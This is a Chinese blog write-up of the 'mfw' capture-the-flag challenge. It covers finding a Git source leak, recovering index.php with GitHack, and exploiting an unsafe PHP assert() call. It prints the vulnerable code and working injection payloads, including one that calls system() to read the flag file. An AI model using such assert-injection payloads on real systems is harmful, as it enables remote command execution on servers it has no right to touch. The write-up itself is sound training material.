攻防世界:mfw

这篇博客讲述了如何发现并利用Git源码泄露,通过GitHack下载源码,然后利用PHP的assert函数执行命令,展示了payload构造过程,包括如何绕过安全检查执行phpinfo()和cat flag.php等操作。
摘要由CSDN通过智能技术生成

 几个页面点开看一看,有个Git,自然想到Git源码泄露

 扫一下,还真有

 然后用GitHack来下载一下源码。

 OK!有个flag.php 就先查看这个文件

 在index.php 中有这样的代码。

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

可以利用assert进行命令执行。

就和SQL注入拼接SQL语句一样,我们也可以来拼接PHP语句。

payload:http://111.200.241.244:49226/?page=')or  phpinfo();//

 执行了。

http://111.200.241.244:49226/?page=')or system('cat templates/flag.php');//

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值